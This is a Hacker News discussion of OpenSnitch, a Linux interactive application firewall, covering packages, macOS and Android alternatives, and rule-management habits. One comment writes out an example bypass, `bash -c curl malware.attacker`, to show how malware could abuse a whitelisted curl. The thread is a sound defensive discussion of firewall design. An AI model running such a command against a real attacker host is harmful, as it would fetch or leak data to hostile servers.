[HN Gopher] OpenSnitch is a GNU/Linux interactive application fi...
___________________________________________________________________
OpenSnitch is a GNU/Linux interactive application firewall
Author : dp-hackernews
Score : 231 points
Date : 2024-08-10 14:15 UTC (8 hours ago)
(HTM) web link (github.com)
(TXT) w3m dump (github.com)
| vhguru wrote:
| Would be great to have Arch and OpenSUSE packages too.
| jiripospisil wrote:
| There is an official package for Arch Linux. It doesn't ship
| with the ebpf modules for some reason though (you need to get
| them separately from AUR).
| diggan wrote:
| `opensnitch` is in the extra repository on Arch, and
| `opensnitch-ebpf-module` exists on the AUR.
| amingilani wrote:
| Is there an open source equivalent for MacOS?
| jiripospisil wrote:
| There's Lulu based on Apple's Network Extension framework but
| there are quite a few issues with the framework itself (it will
| briefly initiate a connection even though there's a deny rule
| for that address etc).
|
| https://github.com/objective-see/LuLu
| lelag wrote:
| Yes, there is: Lulu at https://objective-
| see.org/products/lulu.html.
| eep_social wrote:
| I tried LuLu and it was okay but I did end up trying and
| subsequently buying Little Snitch. The level of UX polish
| wasn't quite there for me with LuLu.
| collinvandyck76 wrote:
| I also feel the same way re: UX polish. I haven't bought
| little snitch yet, but was kind of wondering if I even needed
| to. I've already got a pihole on my tailnet that blocks a
| fair amount of things, and then ublock origin on firefox to
| boot. If LS were only like $20 I'd probably just buy it for
| the pleasing graphs, but otherwise I'm not sure what extra
| value it adds. There's probably a usecase for it given the
| other things I have, but perhaps I'm not the target audience.
| eep_social wrote:
| I felt similarly, waited a long time on the trial, and
| grabbed it on sale for a good bit off retail after I was
| sure that it met my needs.
| samlinnfer wrote:
| I've tried to use it extensively (as an interactive firewall).
| However there are just some problems (that are not the fault of
| OpenSnitch) that I'm not even sure that are even solvable.
|
| For example, supposed I run `curl` on the terminal, I can either
| always decide on a case-by-case basis to allow it thru, or I'm
| required to whitelist it permanently. Once I've whitelisted
| generic tools like `curl` or `wget`, then the floodgates are
| really open, since any malware that have compromised my machine
| can just use `curl` or `wget` to get to the internet without
| hitting the firewall.
| haswell wrote:
| I've found that by using subdomain wildcards and/or subnets, I
| build up a stable set of rules pretty quickly and then only
| have to review requests to new endpoints once in awhile.
|
| To me, the peace of mind knowing that I'll be prompted to allow
| new access is worth the initial hassle. And once the habit is
| built, it's pretty easy to manage.
|
| _Editing to add_ : I also use expiring rules regularly. Maybe
| I trust an installer and want to let it do its thing. So I open
| it up with a rule for the executable expiring in the near
| future (options include: forever, until reboot, for the next
| 30s, for the next 5 mins, etc). This can drastically simplify
| some tasks if there are a large number of endpoints for some
| reason and avoids leaving a hole open permanently.
| xyst wrote:
| IMO - requires a ton of work. Adoption requires updating
| rules quite often
| haswell wrote:
| Sounds like that varies widely by person/use case. I've
| been using this software for a couple years at this point.
| I don't have to update rules all that often (usually a few
| rules/week), and when I do, it's usually a 10-30 second
| detour. The only time it takes more work is if I don't know
| why something is trying to connect. But that's exactly the
| scenario I'm targeting, i.e. calling attention to the weird
| looking connections.
|
| My use cases are general productivity, development on side
| projects and a variety of software experiments, gaming, and
| some local AI stuff.
|
| I also don't see this as a ton of work. Rules are 99% pre-
| configured for you and all you have to do is choose the
| scope and duration of the rule and whether to reject or
| allow.
|
| I'll admit it's _annoying_ once in awhile if there's a
| major update to software that spawns a bunch of new rules,
| but once I get past the feeling of being annoyed, it's
| really an extremely simple and quick process.
|
| Really have to emphasize the habit creation part. After I
| stuck with it for a few weeks, it became second nature and
| I stopped getting annoyed for the most part. I consider
| this a worthwhile habit to build if you're trying lots of
| code/libraries and want to know what's phoning where.
| BadBadJellyBean wrote:
| A few rules per week sounds like a lot. I think I am not
| paranoid enough to micromanage my connections like this.
| haswell wrote:
| In terms of time spent, that amounts to about one minute
| per week for me right now. Sometimes less.
|
| The user experience is streamlined, and adding rules
| involves responding to a dialog that automatically pops
| up when a connection is attempted. UX is key here and
| this would be a very different story if you had to go
| into a separate rule management interface every time.
|
| Regarding paranoia, I don't see it that way. Supply chain
| attacks are alive and well, and if you're running other
| people's code on a regular basis, this is a low cost
| precautionary measure. I totally recognize that not
| everyone has the same risk profile or tolerance.
| chefandy wrote:
| It's the filter configured per user, or is it system-wide? I
| know you can filter per-user with IP tables and whatever the
| newer one is, but I haven't dug that deep into open snitch.
| Maybe a single trusted user account without a login that you
| could su into? I wonder if you could also whitelist a VM
| process and spin up single-use VM sandboxes to use when you
| want to do a bunch of work like that.
|
| Definitely a minor hassle to set up compared to just saying yes
| or no to permissions, but it's not complicated, if it works.
| netule wrote:
| I wonder if there's a way to configure it so that when the
| parent cmd is a trusted command (say, a bash/zsh owned by the
| user), it could let the curl command through and otherwise
| block it. But yeah, that seems like a bit of a hassle.
| akdev1l wrote:
| Then any process can do `system("bash -c curl
| malware.attacker")`
| netule wrote:
| The bash command line wouldn't be the same as the one
| launched by your terminal, though. But yes, I'm sure there
| are myriad exploits around something like that.
| ddtaylor wrote:
| What could work instead is something where you run a
| command like `opensnitch-context dev` and it would talk
| to the running daemon to do proper authentication ("do
| you want to allow this context to be used?") and then
| hopefully some other magic (cgroups?) to know if the
| processes are part of that context even if they are
| sparse/nested child processes.
| phoe-krk wrote:
| You'd need a firewall that is not just TCP/UDP-aware, but
| HTTP(S)-aware, and a way for your firewall to sniff on TLS-
| encrypted traffic.
| diggan wrote:
| Or be ok with filtering HTTP/TLS traffic based on the domain
| only, as that part isn't encrypted (the SNI [Server Name
| Indication]). OpenSnitch should be able to allow/disallow
| based on that, rather than having to decrypt the TLS part.
| djent wrote:
| so don't do that. problem solved
| xyst wrote:
| Might be the same but what if you allow all curl/wget traffic
| for 'dev' user, but continue to flag any traffic for 'normal'
| user
|
| for dev work run 'su -c curl ... dev'
|
| But if malicious program in normal user space is running, then
| app firewall flags curl and wget use appropriately.
|
| It would be annoying to input password every time so maybe
| setup PAM to use yubikey or biometric? Also make sure this user
| cannot login and does not have a password.
| fsflover wrote:
| The solution that worked for me was to switch to Qubes OS,
| where everything runs in VMs with strong hardware-assisted
| isolation.
| irundebian wrote:
| I switched from Qubes OS to Fedora+Flatpak+Opensnitch.
| Couldn't make it to run Wayland on my hybrid GPU system
| (Nvidia). QubesOS drained battery very quickly and since
| graphics is afaik software rendered, I've gotten into
| problems in watching HD videos (e. g. a lot of dropped frames
| on Youtube).
| fsflover wrote:
| > graphics is afaik software rendered
|
| Yes, this is accurate (for security reasons). However you
| still should not have serious problems with Youtube:
| https://forum.qubes-os.org/t/hd-video-playback-on-qubes-
| os-o... (see also a few next posts).
|
| How to fix it if you do have problems: https://forum.qubes-
| os.org/t/improve-video-playback-performa...
|
| Why did you need Wayland on Qubes?
| mixmastamyk wrote:
| This is great for catching sloppy apps that make an excessive
| number of connections. Thunderbird, I'm looking at you.
|
| I like it, but it has a small annoyance in that the temporary
| rules that have expired don't get deleted or marked in the
| interface. So I have to restart the gui once in a while to clear
| them.
| richardlblair wrote:
| Not to be that guy, because I never really have the time
| myself. But, I'm sure PRs are welcome
| mixmastamyk wrote:
| Have thought about it, though haven't used QT in twenty
| years.
| orkj wrote:
| Does something like this exist for my phone, android
| specifically? Any good recommendations?
| Joe_Cool wrote:
| Sadly all real firewalls need root. I was using AFWall+ for a
| long time it has neat controls for every app to allow or deny
| Wifi, Cell or LAN (if you have). It is a iptables/nftables
| frontend so you can customize the rules to your heart's
| content: https://github.com/ukanth/afwall Works from Android 2+
|
| Without root only VPN solutions like Adguard are available.
|
| EDIT: if you want neat stats: Glasswire has an Android version.
| I have only used the beta so I have no idea about its current
| state. Might be worth checking out though.
| ignoramous wrote:
| _ex-AOSP and rethink dns+firewall dev here_
|
| > _Sadly all real firewalls need root_
|
| What do you mean by a "real" firewall? It is very much
| possible to build a userspace firewall in Android using the
| VPN APIs.
|
| On Android, ROMs like GrapheneOS, Lineage, and CalyxOS have
| firewalls built-in.
|
| > _Glasswire has an Android version_
|
| Note though, Glasswire was recently acquired by another
| company: https://archive.is/KW2R3
| yndoendo wrote:
| I thought parts of the Android OS can by-pass the VPN so
| the firewall becomes ineffective against blocking Google,
| OEMs, and others that have root. Wouldn't the VPN API being
| used as a firewall also prevent one to use a VPN client at
| the same time?
| Joe_Cool wrote:
| > Note though, Glasswire was recently acquired by another
| company
|
| Ah that's why the premium stuff is now free. I was
| wondering. Let's hope it's not the first sign of
| enshittification.
|
| > What do you mean by a "real" firewall?
|
| In my experience the "block all non VPN traffic" options in
| Android don't work reliably. iptables does however.
|
| It's a sad state that you cannot even set a static IPv6 on
| Android without root.
| sureglymop wrote:
| The app "Rethink: DNS + Firewall + VPN" has similar features.
| FireInsight wrote:
| TrackerControl is great too. Both are FOSS and can be used in
| the backgroud for using a custom DNS server and blocking
| certain categories of domains.
| arminiusreturns wrote:
| I really like Rethink DNS. I have learned many things from
| watching it (such as I think Signal is compromised by some
| five-eyes "crossing the border" fuckery.)
| SparkyMcUnicorn wrote:
| My non-root solution is to use NextDNS or ControlD with
| "private DNS" (DNS over TLS).
|
| Doesn't stop direct IP connections, but it's good enough.
|
| I also have the CLI installed on OpnSense so DoH is enforced
| for all devices on my LAN as well.
| supriyo-biswas wrote:
| There's netguard[1], although most of the convenience features
| are behind a small payment.
|
| [1] https://netguard.me
| butz wrote:
| "Small payment" is an understatement :)
|
| "You can get all current and future NetGuard pro features
| (including updates) without Google Play services for the
| GitHub or F-Droid version by a one time donation of EUR 0.10
| or more. If you donate 7 euros or more, you can activate the
| pro features on all Android devices you personally own, else
| you can activate the pro features one time only."
| ggeorgovassilis wrote:
| Netguard is fantastic, although it takes a while to get a
| safe setup working. I'm blocking traffic by default and get
| to see all the blocked connection attempts - the extent to
| which apps transmit data to various parties is depressing.
| Netguard should be a standard OS feature.
| mikae1 wrote:
| GrapheneOS can at least block internet traffic for specific
| apps. But can't do it for port ranges or specific domains.
| JoosToopit wrote:
| AFWall+
|
| Switched to it from NetGuard mentioned above.
| vlovich123 wrote:
| How does this compare with something like UFW? Is the main thing
| a UI to view ongoing activity?
| pull_my_finger wrote:
| OpenSnitch prompts you when there's network activity. So if
| random app makes a telemetry call or something, you get the
| option to white/greylist that connection with granularity, like
| OK to make a connection to that address from this executable
| etc, or always OK to this address, and with duration options
| like once/for 15 seconds, until reboot etc. Once you get over
| the hurdle of whitelisting the apps you use and trust, it's
| actually pretty nice and gives you good insight into what your
| apps/games are doing you otherwise wouldn't have known about.
| zargon wrote:
| UFW isn't an application firewall, it only blocks/allows port
| numbers (system-wide), as far as I know.
| irundebian wrote:
| That's right.
| irundebian wrote:
| Can recommend it on Fedora over fiddling with firewalld/firewall-
| config.
| stusmall wrote:
| This is what finally got me over to NixOS. In the past when I've
| used application firewalls its a lot of set up that often breaks
| on updates changing paths or I have to redo it all whenever I
| move to a new computer. Just tons and tons of churn and wasted
| effort.
|
| By integrating with the package manager that hasn't been an
| issue. Once I got through the initial work of setting up my
| whitelists I just have a little bit of effort each time I add a
| new package to my nix configs. If I don't want to take on the
| effort of adding a whitelist to my nix config, I can just add a
| temporary whitelist that lasts until the next reboot.
|
| It was a steep learning curve and a lot of work, but now its a
| breeze to maintain.
| ranger_danger wrote:
| I have tried to use it off and on many times, but all the random
| crashes I get really make it very difficult.
___________________________________________________________________
(page generated 2024-08-10 23:00 UTC)